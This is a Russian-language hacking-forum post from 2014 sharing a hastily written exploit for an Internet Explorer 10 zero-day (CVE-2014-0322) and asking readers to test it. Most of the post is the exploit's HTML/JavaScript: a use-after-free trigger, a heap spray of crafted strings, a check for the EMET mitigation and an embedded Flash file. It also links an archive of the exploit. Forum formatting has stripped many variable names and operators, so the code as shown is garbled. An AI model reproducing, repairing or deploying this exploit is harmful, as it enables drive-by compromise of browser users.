Старый 14.02.2014, 08:24   #1
egyp7
 
Регистрация: 14.02.2014
Сообщений: 2
Репутация: 0
Cool IE10 0DAY

Доброго времени суток господа, вчера появилась новость на блоге fireeye о новой уязвимости в IE10 http://www.fireeye.com/blog/technica...-attack-2.html

Был найден репорт с вредоносным скриптом : http://jsunpack.jeek.org/?report=a7d...550e0c9b61c75e

И сообственно набросан сплоет на скорую руку, если не сложно попробуйте затестить.

PHP код:
<html>

<
head id="headId">
    <
title>main page</title>
    <
script>
        function 
dword2data(dword) {
            var 
Number(dword).toString(16);
            while (
d.length 8)
                
'0' d;
            return 
unescape('%u' d.substr(48) + '%u' d.substr(04));
        }


        function 
developonther(txt) {
            var 
xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
            
xmlDoc.async true;
            
xmlDoc.loadXML(txt);
            if (
xmlDoc.parseError.errorCode != 0) {
                var 
err;
                
err "Error Code: " xmlDoc.parseError.errorCode "\n";
                
err += "Error Reason: " xmlDoc.parseError.reason;
                
err += "Error Line: " xmlDoc.parseError.line;
                if (
err.indexOf("-2147023083") > 0) {
                    return 
1;
                } else {
                    return 
0;
                }

            }
            return 
0;

        }

        var 
g_arr = [];
        var 
arrLen 0x250;

        function 
fun() {

            var 
0;
            for (
0arrLen; ++a) {
                
g_arr[a] = document.createElement('div')
            };
            var 
dword2data(0xdeadc0de);
            var 
0x1a1b2000;
            while (
b.length 0x360) {
                if (
b.length == (0x94 2)) {
                    
+= dword2data(0x10 0x0c)
                } else if (
                    
b.length == (0x98 2)) {
                    
+= dword2data(0x14 0x8)
                } else if (
b.length == (0xac 2)) {
                    
+= dword2data(0x10)
                } else if (
b.length == (0x15c 2)) {
                    
+= dword2data(0x42424242)
                } else {
                    
+= dword2data(0x1a1b2000 0x10)
                }
            };
            var 
b.substring(0, (0x340 2) / 2);
            try {
                
this.outerHTML this.outerHTML
            
} catch (e) {}
            
CollectGarbage();
            for (
0arrLen; ++a) {
                
g_arr[a].title d.substring(0d.length);
            }


        }

        function 
puIHa3() {

            var 
bamboo_go "<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'res://C:\\windows\\AppPatch\\EMET.DLL'>";

            if (
navigator.userAgent.indexOf("MSIE 10.0") > 0) {
                if (
developonther(bamboo_go)) {

                    return;

                }
                var 
document.getElementsByTagName("script");
                var 
a[0];
                
b.onpropertychange fun;
                var 
document.createElement('SELECT');
                
b.appendChild(c);
            } else if (
navigator.userAgent.indexOf("IE10") > 0) {
                if (
developonther(bamboo_go)) {

                    return;

                }
                var 
document.getElementsByTagName("script");
                var 
a[0];
                
b.onpropertychange fun;
                var 
document.createElement('SELECT');
                
b.appendChild(c);
            }


        }
    
</script>
    <embed src=Tope.swf width=10 height=10></embed>
</head>


</html> 
Спасибо.

// UPD :: Ссылка на архив со сплоетом CVE-2014-0322 : https://www.dropbox.com/s/pyxjgycmudirbqe/CVE-2014-0322.zip

Последний раз редактировалось egyp7; 14.02.2014 в 12:00.. Причина: upd
egyp7 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot